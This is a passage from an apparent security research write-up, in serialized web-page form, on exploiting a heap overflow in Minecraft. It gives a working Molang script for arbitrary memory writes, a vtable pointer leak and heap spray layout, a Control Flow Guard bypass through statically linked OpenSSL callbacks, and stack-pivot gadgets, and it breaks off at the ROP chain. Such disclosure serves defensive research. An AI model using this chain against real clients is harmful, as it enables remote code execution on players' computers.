variable is what we ultimately use for arbitrary read/write.",{"type":24,"tag":32,"props":8044,"children":8045},{},[8046],{"type":30,"value":8047},"Before we can do any arbitrary memory operations, however, we need a leak - ideally the address of any Minecraft executable region - that lets us perform arbitrary reads and writes into the target memory region.",{"type":24,"tag":270,"props":8049,"children":8051},{"id":8050},"leaking-pointers",[8052],{"type":30,"value":8053},"Leaking Pointers",{"type":24,"tag":32,"props":8055,"children":8056},{},[8057,8059,8065],{"type":30,"value":8058},"In C++, an object’s first field is typically a ",{"type":24,"tag":145,"props":8060,"children":8062},{"className":8061},[],[8063],{"type":30,"value":8064},"vtable",{"type":30,"value":8066}," pointer - a pointer into a read-only region of the executable in memory. That means the first field of the entity object contains an address inside the Minecraft executable, and we want to recover that value from our Molang script.",{"type":24,"tag":291,"props":8068,"children":8070},{"code":8069}," Entity Object \n \n +------------+------------+\n | vtable ptr | |\n +------------+ |\n | |\n | |\n | |\n | |\n | |\n | |\n +-> +------------+------------+\n | | buf | len |\n MolangIndexMap -+ +------------+------------+\n | | cap | |\n +--+-> +------------+------------+\n | | buf | len |\nMolangVariableMap -+ +------------+------------+\n | | cap | |\n +----> +------------+ |\n | |\n +-------------------------+\n",[8071],{"type":24,"tag":145,"props":8072,"children":8073},{"__ignoreMap":7},[8074],{"type":30,"value":8069},{"type":24,"tag":32,"props":8076,"children":8077},{},[8078,8080,8085,8087,8092,8094,8099,8101,8106,8108,8113,8114,8119,8121,8126],{"type":30,"value":8079},"The ",{"type":24,"tag":145,"props":8081,"children":8083},{"className":8082},[],[8084],{"type":30,"value":5958},{"type":30,"value":8086}," field inside a ",{"type":24,"tag":145,"props":8088,"children":8090},{"className":8089},[],[8091],{"type":30,"value":5699},{"type":30,"value":8093}," is at offset ",{"type":24,"tag":145,"props":8095,"children":8097},{"className":8096},[],[8098],{"type":30,"value":5965},{"type":30,"value":8100},". We already control a corrupted variable, ",{"type":24,"tag":145,"props":8102,"children":8104},{"className":8103},[],[8105],{"type":30,"value":7993},{"type":30,"value":8107},", whose target we can shift by adding unseen variables: each unseen variable increments the ",{"type":24,"tag":145,"props":8109,"children":8111},{"className":8110},[],[8112],{"type":30,"value":6156},{"type":30,"value":7028},{"type":24,"tag":145,"props":8115,"children":8117},{"className":8116},[],[8118],{"type":30,"value":6211},{"type":30,"value":8120}," by 2 bytes, which in turn advances ",{"type":24,"tag":145,"props":8122,"children":8124},{"className":8123},[],[8125],{"type":30,"value":7993},{"type":30,"value":8127}," by 2 bytes.",{"type":24,"tag":32,"props":8129,"children":8130},{},[8131,8133,8138,8140,8146,8147,8152,8153,8158,8160,8165],{"type":30,"value":8132},"By moving ",{"type":24,"tag":145,"props":8134,"children":8136},{"className":8135},[],[8137],{"type":30,"value":6156},{"type":30,"value":8139}," so it equals ",{"type":24,"tag":145,"props":8141,"children":8143},{"className":8142},[],[8144],{"type":30,"value":8145},"cap - 0x38",{"type":30,"value":7905},{"type":24,"tag":145,"props":8148,"children":8150},{"className":8149},[],[8151],{"type":30,"value":5958},{"type":30,"value":7028},{"type":24,"tag":145,"props":8154,"children":8156},{"className":8155},[],[8157],{"type":30,"value":7993},{"type":30,"value":8159}," will overlap the first 8 bytes of the adjacent heap chunk above - in our case, the entity object (manipulated by the heap spray) - which means those first 8 bytes are the entity’s ",{"type":24,"tag":145,"props":8161,"children":8163},{"className":8162},[],[8164],{"type":30,"value":8064},{"type":30,"value":8166}," pointer. We can then capture that pointer with:",{"type":24,"tag":291,"props":8168,"children":8170},{"code":8169},"variable.saved_vtable_pointer = variable.corrupted_len_ptr;\n",[8171],{"type":24,"tag":145,"props":8172,"children":8173},{"__ignoreMap":7},[8174],{"type":30,"value":8169},{"type":24,"tag":32,"props":8176,"children":8177},{},[8178,8180,8185,8187,8192,8194,8199,8201,8207],{"type":30,"value":8179},"After saving the leak, we add 27 unseen variables to advance ",{"type":24,"tag":145,"props":8181,"children":8183},{"className":8182},[],[8184],{"type":30,"value":6156},{"type":30,"value":8186}," until it equals ",{"type":24,"tag":145,"props":8188,"children":8190},{"className":8189},[],[8191],{"type":30,"value":7930},{"type":30,"value":8193},". That produces the setup required for our arbitrary read/write primitive while having the leaked ",{"type":24,"tag":145,"props":8195,"children":8197},{"className":8196},[],[8198],{"type":30,"value":8064},{"type":30,"value":8200}," address in ",{"type":24,"tag":145,"props":8202,"children":8204},{"className":8203},[],[8205],{"type":30,"value":8206},"variable.saved_vtable_pointer",{"type":30,"value":206},{"type":24,"tag":2719,"props":8209,"children":8210},{},[],{"type":24,"tag":32,"props":8212,"children":8213},{},[8214,8216,8222,8224,8230],{"type":30,"value":8215},"A Molang script that performs an arbitrary write of the value ",{"type":24,"tag":145,"props":8217,"children":8219},{"className":8218},[],[8220],{"type":30,"value":8221},"0x1337",{"type":30,"value":8223}," to the address ",{"type":24,"tag":145,"props":8225,"children":8227},{"className":8226},[],[8228],{"type":30,"value":8229},"vtable + 0x1000",{"type":30,"value":8231}," looks like this:",{"type":24,"tag":291,"props":8233,"children":8235},{"code":8234},"// calculate lower 16\nvariable.corrupted_len_ptr = variable.saved_vtable_lower_16;\nvariable.corrupted_cap_ptr = 0;\n// subtract the offset of `value` field within MolangVariable (0x38)\nvariable.corrupted_len_ptr = variable.corrupted_len_ptr + itof(0x1000 - 0x38);\nvariable.calculated_lower_16 = variable.corrupted_len_ptr;\n\n// calculate middle 16, check if lower 16 calculation overflows\nvariable.corrupted_len_ptr = variable.saved_vtable_middle_16;\nvariable.corrupted_cap_ptr = 0;\n(variable.calculated_lower_16 >= itof(0x10000)) ? {\n variable.corrupted_len_ptr = variable.corrupted_len_ptr + itof(0x1);\n};\nvariable.calculated_middle_16 = variable.corrupted_len_ptr;\n\n// calculate high 16, check if middle 16 calculation overflows\nvariable.corrupted_len_ptr = variable.saved_vtable_high_16;\nvariable.corrupted_cap_ptr = 0;\n(variable.calculated_middle_16 >= itof(0x10000)) ? {\n variable.corrupted_len_ptr = variable.corrupted_len_ptr + itof(0x1);\n};\nvariable.calculated_high_16 = variable.corrupted_len_ptr;\n\n// construct the final pointer\nvariable.corrupted_len_ptr = variable.calculated_middle_16;\nvariable.corrupted_cap_ptr = variable.calculated_high_16;\nvariable.calculated_upper_48 = variable.corrupted_len_ptr;\nvariable.corrupted_len_ptr = variable.calculated_lower_16;\nvariable.corrupted_cap_ptr = variable.calculated_upper_48;\n\n// copy the constructed pointer to MolangVariableMap\nvariable.corrupted_var_map_ptr = variable.corrupted_len_ptr;\n\n// variable.f pointer is now `vtable + 0x1000 - 0x38`\n// and the value 0x1337 is written at `vtable + 0x1000`\nvariable.f = itof(0x1337);\n",[8236],{"type":24,"tag":145,"props":8237,"children":8238},{"__ignoreMap":7},[8239],{"type":30,"value":8234},{"type":24,"tag":270,"props":8241,"children":8243},{"id":8242},"required-heap-layout",[8244],{"type":30,"value":8245},"Required Heap Layout",{"type":24,"tag":32,"props":8247,"children":8248},{},[8249],{"type":30,"value":8250},"To ensure our attack works, the heap spray would manipulate the layout as such once the indices are overwritten:",{"type":24,"tag":291,"props":8252,"children":8254},{"code":8253}," Heap Region 1 Heap Region 2 \n \n+-------------------+ +-------------------+\n| | | |\n| MolangVariableMap | | MolangIndexMap |\n| | | |\n+-------------------+ +-------------------+\n| | | |\n| Entity Object | | Entity Object |\n| | | |\n+-------------------+ +-------------------+\n| | | |\n| MolangVariableMap | | MolangIndexMap |\n| | | |\n+-------------------+ +-------------------+\n| | | |\n| Entity Object | | Entity Object |\n| | | |\n+-------------------+ +-------------------+\n",[8255],{"type":24,"tag":145,"props":8256,"children":8257},{"__ignoreMap":7},[8258],{"type":30,"value":8253},{"type":24,"tag":32,"props":8260,"children":8261},{},[8262,8264,8270,8272,8277,8279,8284,8286,8291,8292,8297],{"type":30,"value":8263},"The first region (",{"type":24,"tag":145,"props":8265,"children":8267},{"className":8266},[],[8268],{"type":30,"value":8269},"Heap Region 1",{"type":30,"value":8271},") contains alternating ",{"type":24,"tag":145,"props":8273,"children":8275},{"className":8274},[],[8276],{"type":30,"value":6033},{"type":30,"value":8278},"-allocated buffers and entity objects. The purpose of this region is that, once a variable index is out of bounds, it can index internal ",{"type":24,"tag":145,"props":8280,"children":8282},{"className":8281},[],[8283],{"type":30,"value":6063},{"type":30,"value":8285}," pointers of ",{"type":24,"tag":145,"props":8287,"children":8289},{"className":8288},[],[8290],{"type":30,"value":6033},{"type":30,"value":2378},{"type":24,"tag":145,"props":8293,"children":8295},{"className":8294},[],[8296],{"type":30,"value":6211},{"type":30,"value":8298}," from the entity object for our main attack.",{"type":24,"tag":32,"props":8300,"children":8301},{},[8302,8304,8310,8312,8317,8319,8324,8326,8331,8333,8338],{"type":30,"value":8303},"The second region (",{"type":24,"tag":145,"props":8305,"children":8307},{"className":8306},[],[8308],{"type":30,"value":8309},"Heap Region 2",{"type":30,"value":8311},") contains interleaved ",{"type":24,"tag":145,"props":8313,"children":8315},{"className":8314},[],[8316],{"type":30,"value":6211},{"type":30,"value":8318},"-allocated buffers and entity objects. This region exists so we can leak an entity object's ",{"type":24,"tag":145,"props":8320,"children":8322},{"className":8321},[],[8323],{"type":30,"value":8064},{"type":30,"value":8325}," pointer into ",{"type":24,"tag":145,"props":8327,"children":8329},{"className":8328},[],[8330],{"type":30,"value":7993},{"type":30,"value":8332}," during our main attack. It could be any object with a ",{"type":24,"tag":145,"props":8334,"children":8336},{"className":8335},[],[8337],{"type":30,"value":8064},{"type":30,"value":8339},", but for simplicity we use the entity object.",{"type":24,"tag":32,"props":8341,"children":8342},{},[8343,8345,8351,8353,8358],{"type":30,"value":8344},"During the attack, overwriting another variable's pointer with\n",{"type":24,"tag":145,"props":8346,"children":8348},{"className":8347},[],[8349],{"type":30,"value":8350},"variable.corrupted_var_map_ptr = variable.corrupted_len_ptr",{"type":30,"value":8352}," will very likely clobber the ",{"type":24,"tag":145,"props":8354,"children":8356},{"className":8355},[],[8357],{"type":30,"value":6534},{"type":30,"value":8359}," pointer of a different entity than the one subject to the initial index corruption. In practice this means: an entity affected by the initial corruption will leak and compute an arbitrary read/write address, then use that address to overwrite a variable pointer in a second, separate entity. The second entity is then used purely to perform arbitrary reads and writes via that variable.",{"type":24,"tag":32,"props":8361,"children":8362},{},[8363],{"type":30,"value":8364},"Because of this cross-entity behavior, we must synchronize all entities. At the time we implemented the exploit we couldn't find a clean way to force synchronized execution. Our workaround was to place all allocated entities at the same world position and put the Molang script into the animation section. Animation scripts are not executed for entities outside the client's field of view, so none of the Molang code runs until the entities become visible.",{"type":24,"tag":32,"props":8366,"children":8367},{},[8368],{"type":30,"value":8369},"The final exploit proceeds in three stages:",{"type":24,"tag":6246,"props":8371,"children":8372},{},[8373,8378,8383],{"type":24,"tag":2659,"props":8374,"children":8375},{},[8376],{"type":30,"value":8377},"Position the player so the sprayed entities are out of view (their Molang scripts remain dormant)",{"type":24,"tag":2659,"props":8379,"children":8380},{},[8381],{"type":30,"value":8382},"Perform the heap spray with signs to create the desired layout for the attack",{"type":24,"tag":2659,"props":8384,"children":8385},{},[8386],{"type":30,"value":8387},"Move the client so all sprayed entities enter the field of view - their animation scripts (our Molang payload) then execute, triggering the leak and the subsequent arbitrary read/write primitive.",{"type":24,"tag":270,"props":8389,"children":8391},{"id":8390},"initial-corruption-variant-lfh-heap-approach",[8392],{"type":30,"value":8393},"Initial Corruption Variant: LFH Heap Approach",{"type":24,"tag":32,"props":8395,"children":8396},{},[8397],{"type":30,"value":8398},"As mentioned above, LFH heap chunks have no headers and chunk data is adjacent, so the attack can also be carried out in the LFH heap instead of the VS heap. In that case the chunk overlap method is unnecessary - the overflown 4-byte value can be used directly to overwrite the first two variable indices.",{"type":24,"tag":32,"props":8400,"children":8401},{},[8402,8404,8409,8411,8417],{"type":30,"value":8403},"There is no variable at index 0 in the global variable map because when a new variable is encountered it is assigned ",{"type":24,"tag":145,"props":8405,"children":8407},{"className":8406},[],[8408],{"type":30,"value":6279},{"type":30,"value":8410},", and ",{"type":24,"tag":145,"props":8412,"children":8414},{"className":8413},[],[8415],{"type":30,"value":8416},"last_index",{"type":30,"value":8418}," is initialized to 0 at program start. Therefore the first two bytes of the 4-byte overflow are irrelevant - only the last two bytes overwrite a single variable index.",{"type":24,"tag":32,"props":8420,"children":8421},{},[8422,8424,8429,8430,8435,8437,8442,8444,8449,8451,8456,8458,8464,8465,8471,8472,8478],{"type":30,"value":8423},"The main attack can be arranged by making the resulting index point at the ",{"type":24,"tag":145,"props":8425,"children":8427},{"className":8426},[],[8428],{"type":30,"value":3129},{"type":30,"value":7028},{"type":24,"tag":145,"props":8431,"children":8433},{"className":8432},[],[8434],{"type":30,"value":6211},{"type":30,"value":8436},". From there, the script can overwrite three variable indices at offset ",{"type":24,"tag":145,"props":8438,"children":8440},{"className":8439},[],[8441],{"type":30,"value":5965},{"type":30,"value":8443}," within the ",{"type":24,"tag":145,"props":8445,"children":8447},{"className":8446},[],[8448],{"type":30,"value":6211},{"type":30,"value":8450}," by using the string type. This works because a Molang string's value is just a ",{"type":24,"tag":145,"props":8452,"children":8454},{"className":8453},[],[8455],{"type":30,"value":6020},{"type":30,"value":8457}," FNV-1 hash; the required string can be found by brute-forcing until the hash contains the three target indices. For example, to overwrite three indices with values ",{"type":24,"tag":145,"props":8459,"children":8461},{"className":8460},[],[8462],{"type":30,"value":8463},"0xfb",{"type":30,"value":377},{"type":24,"tag":145,"props":8466,"children":8468},{"className":8467},[],[8469],{"type":30,"value":8470},"0xfc",{"type":30,"value":2378},{"type":24,"tag":145,"props":8473,"children":8475},{"className":8474},[],[8476],{"type":30,"value":8477},"0xfd",{"type":30,"value":8479}," the script would do:",{"type":24,"tag":291,"props":8481,"children":8483},{"code":8482},"variable.corrupted_index_map_ptr = 'r80n3jsuc';\n",[8484],{"type":24,"tag":145,"props":8485,"children":8486},{"__ignoreMap":7},[8487],{"type":30,"value":8482},{"type":24,"tag":32,"props":8489,"children":8490},{},[8491,8493,8498,8500,8506,8508,8513],{"type":30,"value":8492},"That line would write the ",{"type":24,"tag":145,"props":8494,"children":8496},{"className":8495},[],[8497],{"type":30,"value":6020},{"type":30,"value":8499}," value ",{"type":24,"tag":145,"props":8501,"children":8503},{"className":8502},[],[8504],{"type":30,"value":8505},"0x302700fb00fc00fd",{"type":30,"value":8507}," (string's FNV-1 hash) into the allocated ",{"type":24,"tag":145,"props":8509,"children":8511},{"className":8510},[],[8512],{"type":30,"value":6211},{"type":30,"value":8514}," buffer, overwriting three indices with the required values and setting up the desired arbitrary read / write primitive state.",{"type":24,"tag":80,"props":8516,"children":8518},{"id":8517},"hijacking-execution",[8519],{"type":30,"value":8520},"Hijacking Execution",{"type":24,"tag":32,"props":8522,"children":8523},{},[8524,8526,8531,8533,8539],{"type":30,"value":8525},"Although we can read and write arbitrary values inside the Minecraft memory region - including many ",{"type":24,"tag":145,"props":8527,"children":8529},{"className":8528},[],[8530],{"type":30,"value":8064},{"type":30,"value":8532}," and function pointers in the writable ",{"type":24,"tag":145,"props":8534,"children":8536},{"className":8535},[],[8537],{"type":30,"value":8538},".data",{"type":30,"value":8540}," section - the exploit is not complete: Control Flow Guard (CFG) prevents us from gaining arbitrary code execution by overwriting those pointers and executing a ROP chain.",{"type":24,"tag":32,"props":8542,"children":8543},{},[8544],{"type":30,"value":8545},"CFG is a runtime mitigation that blocks indirect jumps/calls to unapproved addresses; it will crash on an indirect transfer to a location not in its valid-target set.",{"type":24,"tag":32,"props":8547,"children":8548},{},[8549],{"type":30,"value":8550},"Examining Minecraft-specific functions and their disassembly shows the following:",{"type":24,"tag":32,"props":8552,"children":8553},{},[8554],{"type":24,"tag":177,"props":8555,"children":8557},{"alt":179,"src":8556},"/posts/minecraft-heap-overflow-to-rce/image11.png",[],{"type":24,"tag":32,"props":8559,"children":8560},{},[8561,8563,8569,8571,8577,8579,8584,8586,8591,8593,8599,8601,8606,8608,8614,8616,8621],{"type":30,"value":8562},"This snippet calls a method on an object: ",{"type":24,"tag":145,"props":8564,"children":8566},{"className":8565},[],[8567],{"type":30,"value":8568},"rcx",{"type":30,"value":8570}," holds the object pointer, the first ",{"type":24,"tag":145,"props":8572,"children":8574},{"className":8573},[],[8575],{"type":30,"value":8576},"mov",{"type":30,"value":8578}," loads the object's ",{"type":24,"tag":145,"props":8580,"children":8582},{"className":8581},[],[8583],{"type":30,"value":8064},{"type":30,"value":8585}," into ",{"type":24,"tag":145,"props":8587,"children":8589},{"className":8588},[],[8590],{"type":30,"value":5063},{"type":30,"value":8592},", and the function pointer at ",{"type":24,"tag":145,"props":8594,"children":8596},{"className":8595},[],[8597],{"type":30,"value":8598},"rax + 0x8",{"type":30,"value":8600}," is read into ",{"type":24,"tag":145,"props":8602,"children":8604},{"className":8603},[],[8605],{"type":30,"value":5063},{"type":30,"value":8607},". Finally, ",{"type":24,"tag":145,"props":8609,"children":8611},{"className":8610},[],[8612],{"type":30,"value":8613},"__guard_dispatch_icall_fptr",{"type":30,"value":8615}," is called - this is the CFG dispatch function that validates ",{"type":24,"tag":145,"props":8617,"children":8619},{"className":8618},[],[8620],{"type":30,"value":5063},{"type":30,"value":8622}," as a legal call target before invoking it.",{"type":24,"tag":32,"props":8624,"children":8625},{},[8626],{"type":30,"value":8627},"All DLLs in the Minecraft directory are compiled with CFG. However, we later found an assembly snippet in the Minecraft executable that calls an object method directly, without a CFG dispatch:",{"type":24,"tag":32,"props":8629,"children":8630},{},[8631],{"type":24,"tag":177,"props":8632,"children":8634},{"alt":179,"src":8633},"/posts/minecraft-heap-overflow-to-rce/image12.png",[],{"type":24,"tag":32,"props":8636,"children":8637},{},[8638,8640,8646,8648,8654],{"type":30,"value":8639},"Here, the function pointer at ",{"type":24,"tag":145,"props":8641,"children":8643},{"className":8642},[],[8644],{"type":30,"value":8645},"vtable + 0x10",{"type":30,"value":8647}," is loaded into ",{"type":24,"tag":145,"props":8649,"children":8651},{"className":8650},[],[8652],{"type":30,"value":8653},"rdx",{"type":30,"value":8655}," and then called directly.",{"type":24,"tag":32,"props":8657,"children":8658},{},[8659],{"type":30,"value":8660},"This code comes from OpenSSL, and none of the OpenSSL-specific sections contain CFG dispatch calls. Presumably OpenSSL was compiled without CFG and then statically linked into the executable.",{"type":24,"tag":32,"props":8662,"children":8663},{},[8664,8666,8671],{"type":30,"value":8665},"So the remaining task is to locate OpenSSL function or ",{"type":24,"tag":145,"props":8667,"children":8669},{"className":8668},[],[8670],{"type":30,"value":8064},{"type":30,"value":8672}," pointers within Minecraft's writable sections and use those as overwrite targets to hijack execution.",{"type":24,"tag":270,"props":8674,"children":8676},{"id":8675},"locating-overwrite-targets",[8677],{"type":30,"value":8678},"Locating Overwrite Targets",{"type":24,"tag":32,"props":8680,"children":8681},{},[8682,8684,8690,8691,8696,8698,8703,8705,8711],{"type":30,"value":8683},"One of the first targets we identified were the ",{"type":24,"tag":145,"props":8685,"children":8687},{"className":8686},[],[8688],{"type":30,"value":8689},"malloc",{"type":30,"value":2378},{"type":24,"tag":145,"props":8692,"children":8694},{"className":8693},[],[8695],{"type":30,"value":3178},{"type":30,"value":8697}," callbacks. These reside in the ",{"type":24,"tag":145,"props":8699,"children":8701},{"className":8700},[],[8702],{"type":30,"value":8538},{"type":30,"value":8704}," section and are invoked whenever they don’t match the expected ",{"type":24,"tag":145,"props":8706,"children":8708},{"className":8707},[],[8709],{"type":30,"value":8710},"OPENSSL_malloc/free",{"type":30,"value":8712}," symbols:",{"type":24,"tag":32,"props":8714,"children":8715},{},[8716],{"type":24,"tag":177,"props":8717,"children":8719},{"alt":179,"src":8718},"/posts/minecraft-heap-overflow-to-rce/image13.png",[],{"type":24,"tag":32,"props":8721,"children":8722},{},[8723],{"type":30,"value":8724},"However, none of the registers held a pointer to a controllable region where we could place our ROP chain.",{"type":24,"tag":32,"props":8726,"children":8727},{},[8728,8730,8736,8738,8744,8746,8751],{"type":30,"value":8729},"Later, we found another promising function: ",{"type":24,"tag":145,"props":8731,"children":8733},{"className":8732},[],[8734],{"type":30,"value":8735},"ossl_ec_key_new_method_int",{"type":30,"value":8737},". This function creates and initializes an ",{"type":24,"tag":145,"props":8739,"children":8741},{"className":8740},[],[8742],{"type":30,"value":8743},"EC_KEY",{"type":30,"value":8745}," object. What makes it particularly interesting is that it relies on a global structure (in ",{"type":24,"tag":145,"props":8747,"children":8749},{"className":8748},[],[8750],{"type":30,"value":8538},{"type":30,"value":8752},") containing function pointers:",{"type":24,"tag":32,"props":8754,"children":8755},{},[8756],{"type":24,"tag":177,"props":8757,"children":8759},{"alt":179,"src":8758},"/posts/minecraft-heap-overflow-to-rce/image14.png",[],{"type":24,"tag":32,"props":8761,"children":8762},{},[8763,8765,8771,8773,8779,8781,8786,8788,8794,8796,8802,8804,8810,8812,8817],{"type":30,"value":8764},"In the image above, ",{"type":24,"tag":145,"props":8766,"children":8768},{"className":8767},[],[8769],{"type":30,"value":8770},"ret->meth",{"type":30,"value":8772}," is set to ",{"type":24,"tag":145,"props":8774,"children":8776},{"className":8775},[],[8777],{"type":30,"value":8778},"default_ec_key_meth",{"type":30,"value":8780},", which points to a structure of function pointers located in ",{"type":24,"tag":145,"props":8782,"children":8784},{"className":8783},[],[8785],{"type":30,"value":8538},{"type":30,"value":8787},". It then calls ",{"type":24,"tag":145,"props":8789,"children":8791},{"className":8790},[],[8792],{"type":30,"value":8793},"ret->meth->init",{"type":30,"value":8795},", passing the ",{"type":24,"tag":145,"props":8797,"children":8799},{"className":8798},[],[8800],{"type":30,"value":8801},"this",{"type":30,"value":8803}," pointer (",{"type":24,"tag":145,"props":8805,"children":8807},{"className":8806},[],[8808],{"type":30,"value":8809},"ret",{"type":30,"value":8811},"). This alone isn’t especially useful because ",{"type":24,"tag":145,"props":8813,"children":8815},{"className":8814},[],[8816],{"type":30,"value":8809},{"type":30,"value":8818}," is heap-allocated.",{"type":24,"tag":32,"props":8820,"children":8821},{},[8822,8824,8829],{"type":30,"value":8823},"But, if we look at how ",{"type":24,"tag":145,"props":8825,"children":8827},{"className":8826},[],[8828],{"type":30,"value":8793},{"type":30,"value":8830}," is invoked in the disassembly:",{"type":24,"tag":32,"props":8832,"children":8833},{},[8834],{"type":24,"tag":177,"props":8835,"children":8837},{"alt":179,"src":8836},"/posts/minecraft-heap-overflow-to-rce/image15.png",[],{"type":24,"tag":32,"props":8839,"children":8840},{},[8841,8843,8848,8850,8856,8858,8863,8865,8870,8872,8877,8879,8884,8886,8891,8893,8899],{"type":30,"value":8842},"If ",{"type":24,"tag":145,"props":8844,"children":8846},{"className":8845},[],[8847],{"type":30,"value":8793},{"type":30,"value":8849}," is not ",{"type":24,"tag":145,"props":8851,"children":8853},{"className":8852},[],[8854],{"type":30,"value":8855},"NULL",{"type":30,"value":8857},", it is called while ",{"type":24,"tag":145,"props":8859,"children":8861},{"className":8860},[],[8862],{"type":30,"value":5063},{"type":30,"value":8864}," still contains the value of ",{"type":24,"tag":145,"props":8866,"children":8868},{"className":8867},[],[8869],{"type":30,"value":8770},{"type":30,"value":8871}," - that is, a pointer to the structure in ",{"type":24,"tag":145,"props":8873,"children":8875},{"className":8874},[],[8876],{"type":30,"value":8538},{"type":30,"value":8878}," that we control. This is ideal, because we can overwrite ",{"type":24,"tag":145,"props":8880,"children":8882},{"className":8881},[],[8883],{"type":30,"value":8778},{"type":30,"value":8885}," with a pointer to a region in ",{"type":24,"tag":145,"props":8887,"children":8889},{"className":8888},[],[8890],{"type":30,"value":8538},{"type":30,"value":8892}," where our ROP chain is located, and then perform a stack pivot using a ",{"type":24,"tag":145,"props":8894,"children":8896},{"className":8895},[],[8897],{"type":30,"value":8898},"mov rsp, rax; ret",{"type":30,"value":8900},"-style gadget.",{"type":24,"tag":32,"props":8902,"children":8903},{},[8904,8906,8911,8913,8918],{"type":30,"value":8905},"Although we discovered that ",{"type":24,"tag":145,"props":8907,"children":8909},{"className":8908},[],[8910],{"type":30,"value":8735},{"type":30,"value":8912}," is never called by the Minecraft process, this did not turn out to be a problem as we had already found a way to trigger arbitrary function calls through the ",{"type":24,"tag":145,"props":8914,"children":8916},{"className":8915},[],[8917],{"type":30,"value":8710},{"type":30,"value":8919}," callbacks.",{"type":24,"tag":270,"props":8921,"children":8923},{"id":8922},"stack-pivot",[8924],{"type":30,"value":8925},"Stack Pivot",{"type":24,"tag":32,"props":8927,"children":8928},{},[8929,8931,8936,8938,8943,8945,8950,8952,8958],{"type":30,"value":8930},"At this point, the plan is as follows: write our ROP chain into a controlled region of ",{"type":24,"tag":145,"props":8932,"children":8934},{"className":8933},[],[8935],{"type":30,"value":8538},{"type":30,"value":8937},", overwrite ",{"type":24,"tag":145,"props":8939,"children":8941},{"className":8940},[],[8942],{"type":30,"value":8778},{"type":30,"value":8944}," to set up the stack pivot, and finally overwrite one of the callbacks so that calling it triggers ",{"type":24,"tag":145,"props":8946,"children":8948},{"className":8947},[],[8949],{"type":30,"value":8735},{"type":30,"value":8951},". This ultimately calls ",{"type":24,"tag":145,"props":8953,"children":8955},{"className":8954},[],[8956],{"type":30,"value":8957},"default_ec_key_meth->init",{"type":30,"value":8959},", which executes the pivot and begins ROP execution.",{"type":24,"tag":32,"props":8961,"children":8962},{},[8963,8965,8971,8973,8979],{"type":30,"value":8964},"We chose to overwrite the ",{"type":24,"tag":145,"props":8966,"children":8968},{"className":8967},[],[8969],{"type":30,"value":8970},"OPENSSL_free",{"type":30,"value":8972}," callback. This produces only a minor memory leak, while overwriting ",{"type":24,"tag":145,"props":8974,"children":8976},{"className":8975},[],[8977],{"type":30,"value":8978},"OPENSSL_malloc",{"type":30,"value":8980}," would require our replacement function to return a writable, unused memory region.",{"type":24,"tag":32,"props":8982,"children":8983},{},[8984,8986,8992,8993,8999,9001,9006],{"type":30,"value":8985},"For the stack pivot, we found two useful gadgets: ",{"type":24,"tag":145,"props":8987,"children":8989},{"className":8988},[],[8990],{"type":30,"value":8991},"add rsp, 0x10; pop r14; ret",{"type":30,"value":2378},{"type":24,"tag":145,"props":8994,"children":8996},{"className":8995},[],[8997],{"type":30,"value":8998},"xchg rsp, rax; ret",{"type":30,"value":9000},". The exploit writes them into ",{"type":24,"tag":145,"props":9002,"children":9004},{"className":9003},[],[9005],{"type":30,"value":8538},{"type":30,"value":9007}," like this:",{"type":24,"tag":291,"props":9009,"children":9011},{"code":9010}," +-----------------------------+\n+0x00 | add rsp, 0x10; pop r14; ret |\n +-----------------------------+\n+0x08 | padding |\n +-----------------------------+\n+0x10 | xchg rsp, rax; ret |\n +-----------------------------+\n+0x18 | padding (pop r14) |\n +-----------------------------+\n+0x20 | ROP Chain |\n +-----------------------------+\n",[9012],{"type":24,"tag":145,"props":9013,"children":9014},{"__ignoreMap":7},[9015],{"type":30,"value":9010},{"type":24,"tag":32,"props":9017,"children":9018},{},[9019,9021,9026,9028,9034,9036,9041,9043,9048,9050,9055,9057,9062,9064,9069],{"type":30,"value":9020},"The second gadget, ",{"type":24,"tag":145,"props":9022,"children":9024},{"className":9023},[],[9025],{"type":30,"value":8998},{"type":30,"value":9027},", is placed in the slot corresponding to the ",{"type":24,"tag":145,"props":9029,"children":9031},{"className":9030},[],[9032],{"type":30,"value":9033},"init",{"type":30,"value":9035}," function pointer. As mentioned earlier, when ",{"type":24,"tag":145,"props":9037,"children":9039},{"className":9038},[],[9040],{"type":30,"value":8793},{"type":30,"value":9042}," is called, ",{"type":24,"tag":145,"props":9044,"children":9046},{"className":9045},[],[9047],{"type":30,"value":5063},{"type":30,"value":9049}," contains a pointer to ",{"type":24,"tag":145,"props":9051,"children":9053},{"className":9052},[],[9054],{"type":30,"value":8778},{"type":30,"value":9056}," - which we have overwritten and now points to our ",{"type":24,"tag":145,"props":9058,"children":9060},{"className":9059},[],[9061],{"type":30,"value":8991},{"type":30,"value":9063}," gadget in ",{"type":24,"tag":145,"props":9065,"children":9067},{"className":9066},[],[9068],{"type":30,"value":8538},{"type":30,"value":206},{"type":24,"tag":32,"props":9071,"children":9072},{},[9073,9075,9081,9083,9088,9090,9096,9098,9103,9105,9110,9112,9117,9119,9125,9127,9132,9134,9139],{"type":30,"value":9074},"When the call occurs, ",{"type":24,"tag":145,"props":9076,"children":9078},{"className":9077},[],[9079],{"type":30,"value":9080},"xchg rsp, rax",{"type":30,"value":9082}," swaps the stack pointer with this controlled pointer inside ",{"type":24,"tag":145,"props":9084,"children":9086},{"className":9085},[],[9087],{"type":30,"value":8538},{"type":30,"value":9089},", effectively moving ",{"type":24,"tag":145,"props":9091,"children":9093},{"className":9092},[],[9094],{"type":30,"value":9095},"rsp",{"type":30,"value":9097}," into our ROP region. After the ",{"type":24,"tag":145,"props":9099,"children":9101},{"className":9100},[],[9102],{"type":30,"value":8809},{"type":30,"value":9104},", execution continues at ",{"type":24,"tag":145,"props":9106,"children":9108},{"className":9107},[],[9109],{"type":30,"value":8991},{"type":30,"value":9111},", which advances ",{"type":24,"tag":145,"props":9113,"children":9115},{"className":9114},[],[9116],{"type":30,"value":9095},{"type":30,"value":9118}," by ",{"type":24,"tag":145,"props":9120,"children":9122},{"className":9121},[],[9123],{"type":30,"value":9124},"0x18",{"type":30,"value":9126}," bytes, skipping over the padding and the ",{"type":24,"tag":145,"props":9128,"children":9130},{"className":9129},[],[9131],{"type":30,"value":8998},{"type":30,"value":9133}," gadget. From there, the stack pivot is complete and the ROP chain (placed above ",{"type":24,"tag":145,"props":9135,"children":9137},{"className":9136},[],[9138],{"type":30,"value":8998},{"type":30,"value":9140},") begins executing.",{"type":24,"tag":80,"props":9142,"children":9144},{"id":9143},"rop-chain",[9145],{"type":30,"value":9146},"ROP Chain",{"type":24,"tag":32,"props":9148,"children":9149},{},[9150,9152,9158,9160,9166],{"type":30,"value":9151},"For the demo, the ROP chain simply calls 